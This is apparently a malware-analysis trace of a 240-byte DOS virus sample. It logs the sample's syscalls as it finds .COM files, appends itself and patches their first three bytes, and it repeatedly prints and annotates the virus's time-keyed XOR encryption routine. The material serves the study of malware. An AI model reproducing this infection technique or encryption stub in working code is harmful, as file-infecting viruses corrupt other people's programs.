Sample viewer

vx.netlux.org/Virus.DOS.SillyC.240.a


Syscalls:

Time | Syscall Op (DOS INT 21h function number, decimal) | PC | Syscall Name
2018-12-17T22:49:04.112021029Z 26 PC: 12a62 | Set disk transfer address
2018-12-17T22:49:04.114344169Z 78 PC: 12a77 | Find first file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Two short routines are visible: a key setup (0x12b0e-0x12b15) and a
; byte-wise XOR loop (0x12b16-0x12b25). Both are annotated below.
2018-12-17T22:49:04.120670215Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes, and only 256 keys exist
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions -
; both routines have returned above and these bytes differ between snapshots.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A 2E 63 6F 6D), presumably the Find first/next search mask - confirm
; against the raw bytes. 0x12b29-0x12b2b change from snapshot to snapshot and
; may be the 3-byte read buffer - TODO confirm.
0x12b26: add byte ptr [di + 0x5a], cl
0x12b29: int 0x20
0x12b2b: add byte ptr [bp + si], ch
0x12b2d: arpl word ptr cs:[bx + 0x6d], bp
0x12b31: add cl, ch
0x12b33: add byte ptr [bx + si], al
0x12b35: add word ptr [bx], di
0x12b37: aas
2018-12-17T22:49:04.123652663Z 61 PC: 12a93 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:04.128281348Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.134863176Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.135935522Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.498629036Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.50044547Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.507825265Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.509345697Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.517393492Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.519971341Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions;
; the 32-bit call target below is an artifact of that, not a real branch.
; The bytes at 0x12b2c-0x12b30 appear to be the ASCII string "*.com"
; (the trailing 6F 6D are the outsw/insw lines) - confirm against raw bytes.
0x12b26: cmp cl, byte ptr [di + 0x5a]
0x12b29: call 0x632e5567
0x12b2f: outsw dx, word ptr [si]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: xchg ax, sp
0x12b34: add word ptr [bx + di], ax
0x12b36: aas
2018-12-17T22:49:04.522305005Z 61 PC: 12a93 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:04.530822134Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.53765724Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.539000235Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.542499209Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.543817315Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.553469378Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.556259791Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.564009408Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.566822935Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A 2E 63 6F 6D), presumably the Find first/next search mask - confirm
; against the raw bytes.
0x12b26: cmp cl, byte ptr [di + 0x5a]
0x12b29: mov dx, 0x10b
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb byte ptr [bx + si], al
0x12b35: add word ptr [bx], di
0x12b37: aas
2018-12-17T22:49:04.570019357Z 61 PC: 12a93 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:04.5772684Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.58363222Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.58552936Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.589183223Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.590729806Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.593533569Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.596272155Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.603621162Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.607093503Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions;
; the 32-bit call target below is an artifact of that, not a real branch.
; The bytes at 0x12b2c-0x12b30 appear to be the ASCII string "*.com"
; (the trailing 6F 6D are the outsw/insw lines) - confirm against raw bytes.
0x12b26: inc ax
0x12b27: dec bp
0x12b28: pop dx
0x12b29: call 0x632e5533
0x12b2f: outsw dx, word ptr [si]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: pop cx
2018-12-17T22:49:04.610389591Z 61 PC: 12a93 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:04.616947664Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.623399001Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.625671563Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.628558764Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.629852439Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.633432724Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.635612206Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.641032136Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.643429891Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A 2E 63 6F 6D), presumably the Find first/next search mask - confirm
; against the raw bytes.
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.645077405Z 61 PC: 12a93 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:04.649280954Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.653396064Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.655058683Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.656902543Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.65801201Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.660523013Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.661692333Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.666822182Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.669408088Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A 2E 63 6F 6D), presumably the Find first/next search mask - confirm
; against the raw bytes.
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.671074115Z 61 PC: 12a93 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:04.675124895Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.681646662Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.68272976Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.687928571Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.689621639Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.693609098Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.695678155Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.701587531Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.703419206Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A as the mov ah immediate, then 2E 63 6F 6D as the arpl line), presumably
; the Find first/next search mask - confirm against the raw bytes.
0x12b26: inc bp
0x12b27: dec bp
0x12b28: pop dx
0x12b29: fninit
0x12b2b: mov ah, 0x2a
0x12b2d: arpl word ptr cs:[bx + 0x6d], bp
0x12b31: add cl, ch
0x12b33: add dword ptr [bx + di], ax
2018-12-17T22:49:04.704999161Z 61 PC: 12a93 | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:04.710859582Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.715544054Z 66 PC: 12aba | Move file pointer
2018-12-17T22:49:04.716609479Z 64 PC: 12ac7 | Write file or device (Write 240 bytes on handle 5)
2018-12-17T22:49:04.718741002Z 66 PC: 12add | Move file pointer
2018-12-17T22:49:04.72029895Z 64 PC: 12ae8 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:04.731618933Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.733187882Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.739166668Z 79 PC: 12a77 | Find next file
; Disassembly of memory starting at the PC reported for the "Get time" call.
; Key setup at 0x12b0e-0x12b15, byte-wise XOR loop at 0x12b16-0x12b25.
2018-12-17T22:49:04.741135888Z 44 PC: 12b0e | Get time 0x12b0e: xor dl, ch  ; DOS Get Time returns CH = hour, DL = hundredths; dl = DL ^ CH
0x12b10: mov byte ptr ds:[bp + 0x1e6], dl  ; keep the time-derived byte; it is read back at 0x12b17
0x12b15: ret
0x12b16: push ax  ; AX is restored at 0x12b24
0x12b17: mov ah, byte ptr ds:[bp + 0x1e6]  ; ah = the stored key byte
0x12b1c: mov di, si  ; destination offset = source offset (in place only if ES == DS - not shown here)
0x12b1e: lodsb al, byte ptr [si]
0x12b1f: xor al, ah  ; single-byte XOR: the same loop encodes and decodes
0x12b21: stosb byte ptr es:[di], al
0x12b22: loop 0x12b1e  ; CX = byte count, set by the caller (outside this listing)
0x12b24: pop ax
0x12b25: ret
; NOTE(review): from 0x12b26 on, the listing is data decoded as instructions.
; The encodings at 0x12b2c-0x12b30 are consistent with the ASCII string "*.com"
; (2A 2E 63 6F 6D), presumably the Find first/next search mask - confirm
; against the raw bytes.
0x12b26: dec bx
0x12b27: dec bp
0x12b28: pop dx
0x12b29: mov dx, 0x10d
0x12b2c: sub ch, byte ptr [0x6f63]
0x12b30: insw word ptr es:[di], dx
0x12b31: add cl, ch
0x12b33: sbb al, byte ptr [bx + si]
2018-12-17T22:49:04.74395948Z 61 PC: 12a93 | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:04.749661502Z 63 PC: 12aa1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:04.751409113Z 87 PC: 12af7 | Get or set file date and time
2018-12-17T22:49:04.753669994Z 62 PC: 12afb | Close file
2018-12-17T22:49:04.760976062Z 79 PC: 12a77 | Find next file
2018-12-17T22:49:04.763387098Z 26 PC: 12b07 | Set disk transfer address